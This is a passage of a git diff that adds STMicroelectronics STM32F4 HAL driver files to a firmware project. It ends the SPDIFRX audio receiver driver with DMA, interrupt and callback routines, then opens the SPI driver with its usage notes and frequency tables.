flag is set */ + do + { + if (count == 0U) + { + /* Disable TXE, RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts for the interrupt process */ + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_RXNE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_CSRNE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_PERRIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_OVRIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_SBLKIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_SYNCDIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_IFEIE); + + hspdif->State= HAL_SPDIFRX_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hspdif); + + return HAL_TIMEOUT; + } + count--; + } while (__HAL_SPDIFRX_GET_FLAG(hspdif, SPDIFRX_FLAG_SYNCD) == RESET); + + /* Start reception */ + __HAL_SPDIFRX_RCV(hspdif); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hspdif); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive an amount of data (Control Flow) with DMA + * @param hspdif SPDIFRX handle + * @param pData a 32-bit pointer to the Receive data buffer. + * @param Size number of data (Control Flow) sample to be received + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPDIFRX_ReceiveControlFlow_DMA(SPDIFRX_HandleTypeDef *hspdif, uint32_t *pData, uint16_t Size) +{ + uint32_t count = SPDIFRX_TIMEOUT_VALUE * (SystemCoreClock / 24U / 1000U); + + const HAL_SPDIFRX_StateTypeDef tempState = hspdif->State; + + if((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + if((tempState == HAL_SPDIFRX_STATE_READY) || (tempState == HAL_SPDIFRX_STATE_BUSY_RX)) + { + hspdif->pCsBuffPtr = pData; + hspdif->CsXferSize = Size; + hspdif->CsXferCount = Size; + + /* Process Locked */ + __HAL_LOCK(hspdif); + + hspdif->ErrorCode = HAL_SPDIFRX_ERROR_NONE; + hspdif->State = HAL_SPDIFRX_STATE_BUSY_CX; + + /* Set the SPDIFRX Rx DMA Half transfer complete callback */ + hspdif->hdmaCsRx->XferHalfCpltCallback = SPDIFRX_DMACxHalfCplt; + + /* Set the SPDIFRX Rx DMA transfer complete callback */ + hspdif->hdmaCsRx->XferCpltCallback = SPDIFRX_DMACxCplt; + + /* Set the DMA error callback */ + hspdif->hdmaCsRx->XferErrorCallback = SPDIFRX_DMAError; + + /* Enable the DMA request */ + if(HAL_DMA_Start_IT(hspdif->hdmaCsRx, (uint32_t)&hspdif->Instance->CSR, (uint32_t)hspdif->pCsBuffPtr, Size) != HAL_OK) + { + /* Set SPDIFRX error */ + hspdif->ErrorCode = HAL_SPDIFRX_ERROR_DMA; + + /* Set SPDIFRX state */ + hspdif->State = HAL_SPDIFRX_STATE_ERROR; + + /* Process Unlocked */ + __HAL_UNLOCK(hspdif); + + return HAL_ERROR; + } + + /* Enable CBDMAEN bit in SPDIFRX CR register for control flow reception*/ + hspdif->Instance->CR |= SPDIFRX_CR_CBDMAEN; + + if((SPDIFRX->CR & SPDIFRX_CR_SPDIFEN) != SPDIFRX_STATE_RCV) + { + /* Start synchronization */ + __HAL_SPDIFRX_SYNC(hspdif); + + /* Wait until SYNCD flag is set */ + do + { + if (count == 0U) + { + /* Disable TXE, RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts for the interrupt process */ + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_RXNE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_CSRNE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_PERRIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_OVRIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_SBLKIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_SYNCDIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_IFEIE); + + hspdif->State= HAL_SPDIFRX_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hspdif); + + return HAL_TIMEOUT; + } + count--; + } while (__HAL_SPDIFRX_GET_FLAG(hspdif, SPDIFRX_FLAG_SYNCD) == RESET); + + /* Start reception */ + __HAL_SPDIFRX_RCV(hspdif); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hspdif); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief stop the audio stream receive from the Media. + * @param hspdif SPDIFRX handle + * @retval None + */ +HAL_StatusTypeDef HAL_SPDIFRX_DMAStop(SPDIFRX_HandleTypeDef *hspdif) +{ + /* Process Locked */ + __HAL_LOCK(hspdif); + + /* Disable the SPDIFRX DMA requests */ + hspdif->Instance->CR &= (uint16_t)(~SPDIFRX_CR_RXDMAEN); + hspdif->Instance->CR &= (uint16_t)(~SPDIFRX_CR_CBDMAEN); + + /* Disable the SPDIFRX DMA channel */ + __HAL_DMA_DISABLE(hspdif->hdmaDrRx); + __HAL_DMA_DISABLE(hspdif->hdmaCsRx); + + /* Disable SPDIFRX peripheral */ + __HAL_SPDIFRX_IDLE(hspdif); + + hspdif->State = HAL_SPDIFRX_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hspdif); + + return HAL_OK; +} + +/** + * @brief This function handles SPDIFRX interrupt request. + * @param hspdif SPDIFRX handle + * @retval HAL status + */ +void HAL_SPDIFRX_IRQHandler(SPDIFRX_HandleTypeDef *hspdif) +{ + uint32_t itFlag = hspdif->Instance->SR; + uint32_t itSource = hspdif->Instance->IMR; + + /* SPDIFRX in mode Data Flow Reception */ + if(((itFlag & SPDIFRX_FLAG_RXNE) == SPDIFRX_FLAG_RXNE) && ((itSource & SPDIFRX_IT_RXNE) == SPDIFRX_IT_RXNE)) + { + __HAL_SPDIFRX_CLEAR_IT(hspdif, SPDIFRX_IT_RXNE); + SPDIFRX_ReceiveDataFlow_IT(hspdif); + } + + /* SPDIFRX in mode Control Flow Reception */ + if(((itFlag & SPDIFRX_FLAG_CSRNE) == SPDIFRX_FLAG_CSRNE) && ((itSource & SPDIFRX_IT_CSRNE) == SPDIFRX_IT_CSRNE)) + { + __HAL_SPDIFRX_CLEAR_IT(hspdif, SPDIFRX_IT_CSRNE); + SPDIFRX_ReceiveControlFlow_IT(hspdif); + } + + /* SPDIFRX Overrun error interrupt occurred */ + if(((itFlag & SPDIFRX_FLAG_OVR) == SPDIFRX_FLAG_OVR) && ((itSource & SPDIFRX_IT_OVRIE) == SPDIFRX_IT_OVRIE)) + { + __HAL_SPDIFRX_CLEAR_IT(hspdif, SPDIFRX_IT_OVRIE); + + /* Change the SPDIFRX error code */ + hspdif->ErrorCode |= HAL_SPDIFRX_ERROR_OVR; + + /* the transfer is not stopped */ + HAL_SPDIFRX_ErrorCallback(hspdif); + } + + /* SPDIFRX Parity error interrupt occurred */ + if(((itFlag & SPDIFRX_FLAG_PERR) == SPDIFRX_FLAG_PERR) && ((itSource & SPDIFRX_IT_PERRIE) == SPDIFRX_IT_PERRIE)) + { + __HAL_SPDIFRX_CLEAR_IT(hspdif, SPDIFRX_IT_PERRIE); + + /* Change the SPDIFRX error code */ + hspdif->ErrorCode |= HAL_SPDIFRX_ERROR_PE; + + /* the transfer is not stopped */ + HAL_SPDIFRX_ErrorCallback(hspdif); + } +} + +/** + * @brief Rx Transfer (Data flow) half completed callbacks + * @param hspdif SPDIFRX handle + * @retval None + */ +__weak void HAL_SPDIFRX_RxHalfCpltCallback(SPDIFRX_HandleTypeDef *hspdif) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspdif); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_SPDIFRX_RxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Rx Transfer (Data flow) completed callbacks + * @param hspdif SPDIFRX handle + * @retval None + */ +__weak void HAL_SPDIFRX_RxCpltCallback(SPDIFRX_HandleTypeDef *hspdif) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspdif); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_SPDIFRX_RxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Rx (Control flow) Transfer half completed callbacks + * @param hspdif SPDIFRX handle + * @retval None + */ +__weak void HAL_SPDIFRX_CxHalfCpltCallback(SPDIFRX_HandleTypeDef *hspdif) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspdif); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_SPDIFRX_RxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Rx Transfer (Control flow) completed callbacks + * @param hspdif SPDIFRX handle + * @retval None + */ +__weak void HAL_SPDIFRX_CxCpltCallback(SPDIFRX_HandleTypeDef *hspdif) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspdif); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_SPDIFRX_RxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief SPDIFRX error callbacks + * @param hspdif SPDIFRX handle + * @retval None + */ +__weak void HAL_SPDIFRX_ErrorCallback(SPDIFRX_HandleTypeDef *hspdif) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspdif); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_SPDIFRX_ErrorCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup SPDIFRX_Exported_Functions_Group3 Peripheral State and Errors functions + * @brief Peripheral State functions + * +@verbatim +=============================================================================== +##### Peripheral State and Errors functions ##### +=============================================================================== +[..] +This subsection permit to get in run-time the status of the peripheral +and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief Return the SPDIFRX state + * @param hspdif SPDIFRX handle + * @retval HAL state + */ +HAL_SPDIFRX_StateTypeDef HAL_SPDIFRX_GetState(SPDIFRX_HandleTypeDef const * const hspdif) +{ + return hspdif->State; +} + +/** + * @brief Return the SPDIFRX error code + * @param hspdif SPDIFRX handle + * @retval SPDIFRX Error Code + */ +uint32_t HAL_SPDIFRX_GetError(SPDIFRX_HandleTypeDef const * const hspdif) +{ + return hspdif->ErrorCode; +} + +/** + * @} + */ + +/** + * @brief DMA SPDIFRX receive process (Data flow) complete callback + * @param hdma DMA handle + * @retval None + */ +static void SPDIFRX_DMARxCplt(DMA_HandleTypeDef *hdma) +{ + SPDIFRX_HandleTypeDef* hspdif = ( SPDIFRX_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + + /* Disable Rx DMA Request */ + if(hdma->Init.Mode != DMA_CIRCULAR) + { + hspdif->Instance->CR &= (uint16_t)(~SPDIFRX_CR_RXDMAEN); + hspdif->RxXferCount = 0; + hspdif->State = HAL_SPDIFRX_STATE_READY; + } +#if (USE_HAL_SPDIFRX_REGISTER_CALLBACKS == 1) + hspdif->RxCpltCallback(hspdif); +#else + HAL_SPDIFRX_RxCpltCallback(hspdif); +#endif /* USE_HAL_SPDIFRX_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SPDIFRX receive process (Data flow) half complete callback + * @param hdma DMA handle + * @retval None + */ +static void SPDIFRX_DMARxHalfCplt(DMA_HandleTypeDef *hdma) +{ + SPDIFRX_HandleTypeDef* hspdif = (SPDIFRX_HandleTypeDef*)((DMA_HandleTypeDef*)hdma)->Parent; + +#if (USE_HAL_SPDIFRX_REGISTER_CALLBACKS == 1) + hspdif->RxHalfCpltCallback(hspdif); +#else + HAL_SPDIFRX_RxHalfCpltCallback(hspdif); +#endif /* USE_HAL_SPDIFRX_REGISTER_CALLBACKS */ +} + + +/** + * @brief DMA SPDIFRX receive process (Control flow) complete callback + * @param hdma DMA handle + * @retval None + */ +static void SPDIFRX_DMACxCplt(DMA_HandleTypeDef *hdma) +{ + SPDIFRX_HandleTypeDef* hspdif = ( SPDIFRX_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + + /* Disable Cb DMA Request */ + hspdif->Instance->CR &= (uint16_t)(~SPDIFRX_CR_CBDMAEN); + hspdif->CsXferCount = 0; + + hspdif->State = HAL_SPDIFRX_STATE_READY; +#if (USE_HAL_SPDIFRX_REGISTER_CALLBACKS == 1) + hspdif->CxCpltCallback(hspdif); +#else + HAL_SPDIFRX_CxCpltCallback(hspdif); +#endif /* USE_HAL_SPDIFRX_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SPDIFRX receive process (Control flow) half complete callback + * @param hdma DMA handle + * @retval None + */ +static void SPDIFRX_DMACxHalfCplt(DMA_HandleTypeDef *hdma) +{ + SPDIFRX_HandleTypeDef* hspdif = (SPDIFRX_HandleTypeDef*)((DMA_HandleTypeDef*)hdma)->Parent; + +#if (USE_HAL_SPDIFRX_REGISTER_CALLBACKS == 1) + hspdif->CxHalfCpltCallback(hspdif); +#else + HAL_SPDIFRX_CxHalfCpltCallback(hspdif); +#endif /* USE_HAL_SPDIFRX_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SPDIFRX communication error callback + * @param hdma DMA handle + * @retval None + */ +static void SPDIFRX_DMAError(DMA_HandleTypeDef *hdma) +{ + SPDIFRX_HandleTypeDef* hspdif = ( SPDIFRX_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + + /* Disable Rx and Cb DMA Request */ + hspdif->Instance->CR &= (uint16_t)(~(SPDIFRX_CR_RXDMAEN | SPDIFRX_CR_CBDMAEN)); + hspdif->RxXferCount = 0; + + hspdif->State= HAL_SPDIFRX_STATE_READY; + + /* Set the error code and execute error callback*/ + hspdif->ErrorCode |= HAL_SPDIFRX_ERROR_DMA; + +#if (USE_HAL_SPDIFRX_REGISTER_CALLBACKS == 1) + /* The transfer is not stopped */ + hspdif->ErrorCallback(hspdif); +#else + /* The transfer is not stopped */ + HAL_SPDIFRX_ErrorCallback(hspdif); +#endif /* USE_HAL_SPDIFRX_REGISTER_CALLBACKS */ +} + +/** + * @brief Receive an amount of data (Data Flow) with Interrupt + * @param hspdif SPDIFRX handle + * @retval None + */ +static void SPDIFRX_ReceiveDataFlow_IT(SPDIFRX_HandleTypeDef *hspdif) +{ + /* Receive data */ + (*hspdif->pRxBuffPtr) = hspdif->Instance->DR; + hspdif->pRxBuffPtr++; + hspdif->RxXferCount--; + + if(hspdif->RxXferCount == 0U) + { + /* Disable RXNE/PE and OVR interrupts */ + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_OVRIE | SPDIFRX_IT_PERRIE | SPDIFRX_IT_RXNE); + + hspdif->State = HAL_SPDIFRX_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hspdif); + +#if (USE_HAL_SPDIFRX_REGISTER_CALLBACKS == 1) + hspdif->RxCpltCallback(hspdif); +#else + HAL_SPDIFRX_RxCpltCallback(hspdif); +#endif /* USE_HAL_SPDIFRX_REGISTER_CALLBACKS */ + } +} + +/** + * @brief Receive an amount of data (Control Flow) with Interrupt + * @param hspdif SPDIFRX handle + * @retval None + */ +static void SPDIFRX_ReceiveControlFlow_IT(SPDIFRX_HandleTypeDef *hspdif) +{ + /* Receive data */ + (*hspdif->pCsBuffPtr) = hspdif->Instance->CSR; + hspdif->pCsBuffPtr++; + hspdif->CsXferCount--; + + if(hspdif->CsXferCount == 0U) + { + /* Disable CSRNE interrupt */ + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_CSRNE); + + hspdif->State = HAL_SPDIFRX_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hspdif); + +#if (USE_HAL_SPDIFRX_REGISTER_CALLBACKS == 1) + hspdif->CxCpltCallback(hspdif); +#else + HAL_SPDIFRX_CxCpltCallback(hspdif); +#endif /* USE_HAL_SPDIFRX_REGISTER_CALLBACKS */ + } +} + +/** + * @brief This function handles SPDIFRX Communication Timeout. + * @param hspdif SPDIFRX handle + * @param Flag Flag checked + * @param Status Value of the flag expected + * @param Timeout Duration of the timeout + * @param tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef SPDIFRX_WaitOnFlagUntilTimeout(SPDIFRX_HandleTypeDef *hspdif, uint32_t Flag, FlagStatus Status, uint32_t Timeout, uint32_t tickstart) +{ + /* Wait until flag is set */ + while(__HAL_SPDIFRX_GET_FLAG(hspdif, Flag) == Status) + { + /* Check for the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if(((HAL_GetTick() - tickstart ) > Timeout) || (Timeout == 0U)) + { + /* Disable TXE, RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts for the interrupt process */ + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_RXNE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_CSRNE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_PERRIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_OVRIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_SBLKIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_SYNCDIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_IFEIE); + + hspdif->State= HAL_SPDIFRX_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hspdif); + + return HAL_TIMEOUT; + } + } + } + + return HAL_OK; +} + +/** + * @} + */ +#endif /* STM32F446xx */ + +#endif /* SPDIFRX */ +#endif /* HAL_SPDIFRX_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_spi.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_spi.c new file mode 100644 index 000000000..e15ffcd7c --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_spi.c @@ -0,0 +1,3918 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_spi.c + * @author MCD Application Team + * @brief SPI HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Serial Peripheral Interface (SPI) peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral Control functions + * + Peripheral State functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The SPI HAL driver can be used as follows: + + (#) Declare a SPI_HandleTypeDef handle structure, for example: + SPI_HandleTypeDef hspi; + + (#)Initialize the SPI low level resources by implementing the HAL_SPI_MspInit() API: + (##) Enable the SPIx interface clock + (##) SPI pins configuration + (+++) Enable the clock for the SPI GPIOs + (+++) Configure these SPI pins as alternate function push-pull + (##) NVIC configuration if you need to use interrupt process + (+++) Configure the SPIx interrupt priority + (+++) Enable the NVIC SPI IRQ handle + (##) DMA Configuration if you need to use DMA process + (+++) Declare a DMA_HandleTypeDef handle structure for the transmit or receive Stream/Channel + (+++) Enable the DMAx clock + (+++) Configure the DMA handle parameters + (+++) Configure the DMA Tx or Rx Stream/Channel + (+++) Associate the initialized hdma_tx(or _rx) handle to the hspi DMA Tx or Rx handle + (+++) Configure the priority and enable the NVIC for the transfer complete interrupt on the DMA Tx or Rx Stream/Channel + + (#) Program the Mode, BidirectionalMode , Data size, Baudrate Prescaler, NSS + management, Clock polarity and phase, FirstBit and CRC configuration in the hspi Init structure. + + (#) Initialize the SPI registers by calling the HAL_SPI_Init() API: + (++) This API configures also the low level Hardware GPIO, CLOCK, CORTEX...etc) + by calling the customized HAL_SPI_MspInit() API. + [..] + Circular mode restriction: + (#) The DMA circular mode cannot be used when the SPI is configured in these modes: + (##) Master 2Lines RxOnly + (##) Master 1Line Rx + (#) The CRC feature is not managed when the DMA circular mode is enabled + (#) When the SPI DMA Pause/Stop features are used, we must use the following APIs + the HAL_SPI_DMAPause()/ HAL_SPI_DMAStop() only under the SPI callbacks + [..] + Master Receive mode restriction: + (#) In Master unidirectional receive-only mode (MSTR =1, BIDIMODE=0, RXONLY=1) or + bidirectional receive mode (MSTR=1, BIDIMODE=1, BIDIOE=0), to ensure that the SPI + does not initiate a new transfer the following procedure has to be respected: + (##) HAL_SPI_DeInit() + (##) HAL_SPI_Init() + [..] + Callback registration: + + (#) The compilation flag USE_HAL_SPI_REGISTER_CALLBACKS when set to 1U + allows the user to configure dynamically the driver callbacks. + Use Functions HAL_SPI_RegisterCallback() to register an interrupt callback. + + Function HAL_SPI_RegisterCallback() allows to register following callbacks: + (++) TxCpltCallback : SPI Tx Completed callback + (++) RxCpltCallback : SPI Rx Completed callback + (++) TxRxCpltCallback : SPI TxRx Completed callback + (++) TxHalfCpltCallback : SPI Tx Half Completed callback + (++) RxHalfCpltCallback : SPI Rx Half Completed callback + (++) TxRxHalfCpltCallback : SPI TxRx Half Completed callback + (++) ErrorCallback : SPI Error callback + (++) AbortCpltCallback : SPI Abort callback + (++) MspInitCallback : SPI Msp Init callback + (++) MspDeInitCallback : SPI Msp DeInit callback + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + + (#) Use function HAL_SPI_UnRegisterCallback to reset a callback to the default + weak function. + HAL_SPI_UnRegisterCallback takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (++) TxCpltCallback : SPI Tx Completed callback + (++) RxCpltCallback : SPI Rx Completed callback + (++) TxRxCpltCallback : SPI TxRx Completed callback + (++) TxHalfCpltCallback : SPI Tx Half Completed callback + (++) RxHalfCpltCallback : SPI Rx Half Completed callback + (++) TxRxHalfCpltCallback : SPI TxRx Half Completed callback + (++) ErrorCallback : SPI Error callback + (++) AbortCpltCallback : SPI Abort callback + (++) MspInitCallback : SPI Msp Init callback + (++) MspDeInitCallback : SPI Msp DeInit callback + + [..] + By default, after the HAL_SPI_Init() and when the state is HAL_SPI_STATE_RESET + all callbacks are set to the corresponding weak functions: + examples HAL_SPI_MasterTxCpltCallback(), HAL_SPI_MasterRxCpltCallback(). + Exception done for MspInit and MspDeInit functions that are + reset to the legacy weak functions in the HAL_SPI_Init()/ HAL_SPI_DeInit() only when + these callbacks are null (not registered beforehand). + If MspInit or MspDeInit are not null, the HAL_SPI_Init()/ HAL_SPI_DeInit() + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) whatever the state. + + [..] + Callbacks can be registered/unregistered in HAL_SPI_STATE_READY state only. + Exception done MspInit/MspDeInit functions that can be registered/unregistered + in HAL_SPI_STATE_READY or HAL_SPI_STATE_RESET state, + thus registered (user) MspInit/DeInit callbacks can be used during the Init/DeInit. + Then, the user first registers the MspInit/MspDeInit user callbacks + using HAL_SPI_RegisterCallback() before calling HAL_SPI_DeInit() + or HAL_SPI_Init() function. + + [..] + When the compilation define USE_HAL_PPP_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak (surcharged) callbacks are used. + + [..] + Using the HAL it is not possible to reach all supported SPI frequency with the different SPI Modes, + the following table resume the max SPI frequency reached with data size 8bits/16bits, + according to frequency of the APBx Peripheral Clock (fPCLK) used by the SPI instance. + + @endverbatim + + Additional table : + + DataSize = SPI_DATASIZE_8BIT: + +----------------------------------------------------------------------------------------------+ + | | | 2Lines Fullduplex | 2Lines RxOnly | 1Line | + | Process | Transfer mode |---------------------|----------------------|----------------------| + | | | Master | Slave | Master | Slave | Master | Slave | + |==============================================================================================| + | T | Polling | Fpclk/2 | Fpclk/2 | NA | NA | NA | NA | + | X |----------------|----------|----------|-----------|----------|-----------|----------| + | / | Interrupt | Fpclk/4 | Fpclk/8 | NA | NA | NA | NA | + | R |----------------|----------|----------|-----------|----------|-----------|----------| + | X | DMA | Fpclk/2 | Fpclk/2 | NA | NA | NA | NA | + |=========|================|==========|==========|===========|==========|===========|==========| + | | Polling | Fpclk/2 | Fpclk/2 | Fpclk/64 | Fpclk/2 | Fpclk/64 | Fpclk/2 | + | |----------------|----------|----------|-----------|----------|-----------|----------| + | R | Interrupt | Fpclk/8 | Fpclk/8 | Fpclk/64 | Fpclk/2 | Fpclk/64 | Fpclk/2 | + | X |----------------|----------|----------|-----------|----------|-----------|----------| + | | DMA | Fpclk/2 | Fpclk/2 | Fpclk/64 | Fpclk/2 | Fpclk/128 | Fpclk/2 | + |=========|================|==========|==========|===========|==========|===========|==========| + | | Polling | Fpclk/2 | Fpclk/4 | NA | NA | Fpclk/2 | Fpclk/64 | + | |----------------|----------|----------|-----------|----------|-----------|----------| + | T | Interrupt | Fpclk/2 | Fpclk/4 | NA | NA | Fpclk/2 | Fpclk/64 | + | X |----------------|----------|----------|-----------|----------|-----------|----------| + | | DMA | Fpclk/2 | Fpclk/2 | NA | NA | Fpclk/2 | Fpclk/128| + +----------------------------------------------------------------------------------------------+ + + DataSize = SPI_DATASIZE_16BIT: + +----------------------------------------------------------------------------------------------+ + | | | 2Lines Fullduplex | 2Lines RxOnly | 1Line | + | Process | Transfer mode |---------------------|----------------------|----------------------| + | | | Master | Slave | Master | Slave | Master | Slave | + |==============================================================================================| + | T | Polling | Fpclk/2 | Fpclk/2 | NA | NA | NA | NA | + | X |----------------|----------|----------|-----------|----------|-----------|----------| + | / | Interrupt | Fpclk/4 | Fpclk/4 | NA | NA | NA | NA | + | R |----------------|----------|----------|-----------|----------|-----------|----------| + | X | DMA | Fpclk/2 | Fpclk/2 | NA | NA | NA | NA | + |=========|================|==========|==========|===========|==========|===========|==========| + | | Polling | Fpclk/2 | Fpclk/2 | Fpclk/64 | Fpclk/2 | Fpclk/32 | Fpclk/2 | + | |----------------|----------|----------|-----------|----------|-----------|----------| + | R | Interrupt | Fpclk/4 | Fpclk/4 | Fpclk/64 | Fpclk/2 | Fpclk/64 | Fpclk/2 | + | X |----------------|----------|----------|-----------|----------|-----------|----------| + | | DMA | Fpclk/2 | Fpclk/2 | Fpclk/64 | Fpclk/2 | Fpclk/128 | Fpclk/2 | + |=========|================|==========|==========|===========|==========|===========|==========| + | | Polling | Fpclk/2 | Fpclk/2 | NA | NA | Fpclk/2 | Fpclk/32 | + | |----------------|----------|----------|-----------|----------|-----------|----------| + | T | Interrupt | Fpclk/2 | Fpclk/2 | NA | NA | Fpclk/2 | Fpclk/64 | + | X |----------------|----------|----------|-----------|----------|-----------|----------| + | | DMA | Fpclk/2 | Fpclk/2 | NA | NA | Fpclk/2 | Fpclk/128| + +----------------------------------------------------------------------------------------------+ + @note The max SPI frequency depend on SPI data size (8bits, 16bits), + SPI mode(2 Lines fullduplex, 2 lines RxOnly, 1 line TX/RX) and Process mode (Polling, IT, DMA). + @note + (#) TX/RX processes are HAL_SPI_TransmitReceive(), HAL_SPI_TransmitReceive_IT() and HAL_SPI_TransmitReceive_DMA() + (#) RX processes are HAL_SPI_Receive(), HAL_SPI_Receive_IT() and HAL_SPI_Receive_DMA() + (#) TX processes are HAL_SPI_Transmit(), HAL_SPI_Transmit_IT() and HAL_SPI_Transmit_DMA() + + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup SPI SPI + * @brief SPI HAL module driver + * @{ + */ +#ifdef HAL_SPI_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private defines -----------------------------------------------------------*/ +/** @defgroup SPI_Private_Constants SPI Private Constants + * @{ + */ +#define SPI_DEFAULT_TIMEOUT 100U +#define SPI_BSY_FLAG_WORKAROUND_TIMEOUT 1000U /*!< Timeout 1000 µs */ +/** + * @} + */ + +/* Private macros ------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @defgroup SPI_Private_Functions SPI Private Functions + * @{ + */ +static void SPI_DMATransmitCplt(DMA_HandleTypeDef *hdma); +static void SPI_DMAReceiveCplt(DMA_HandleTypeDef *hdma); +static void SPI_DMATransmitReceiveCplt(DMA_HandleTypeDef *hdma); +static void SPI_DMAHalfTransmitCplt(DMA_HandleTypeDef *hdma); +static void SPI_DMAHalfReceiveCplt(DMA_HandleTypeDef *hdma); +static void SPI_DMAHalfTransmitReceiveCplt(DMA_HandleTypeDef *hdma); +static void SPI_DMAError(DMA_HandleTypeDef *hdma); +static void SPI_DMAAbortOnError(DMA_HandleTypeDef *hdma); +static void SPI_DMATxAbortCallback(DMA_HandleTypeDef *hdma); +static void SPI_DMARxAbortCallback(DMA_HandleTypeDef *hdma); +static HAL_StatusTypeDef SPI_WaitFlagStateUntilTimeout(SPI_HandleTypeDef *hspi, uint32_t Flag, FlagStatus State, + uint32_t Timeout, uint32_t Tickstart); +static void SPI_TxISR_8BIT(struct __SPI_HandleTypeDef *hspi); +static void SPI_TxISR_16BIT(struct __SPI_HandleTypeDef *hspi); +static void SPI_RxISR_8BIT(struct __SPI_HandleTypeDef *hspi); +static void SPI_RxISR_16BIT(struct __SPI_HandleTypeDef *hspi); +static void SPI_2linesRxISR_8BIT(struct __SPI_HandleTypeDef *hspi); +static void SPI_2linesTxISR_8BIT(struct __SPI_HandleTypeDef *hspi); +static void SPI_2linesTxISR_16BIT(struct __SPI_HandleTypeDef *hspi); +static void SPI_2linesRxISR_16BIT(struct __SPI_HandleTypeDef *hspi); +#if (USE_SPI_CRC != 0U) +static void SPI_RxISR_8BITCRC(struct __SPI_HandleTypeDef *hspi); 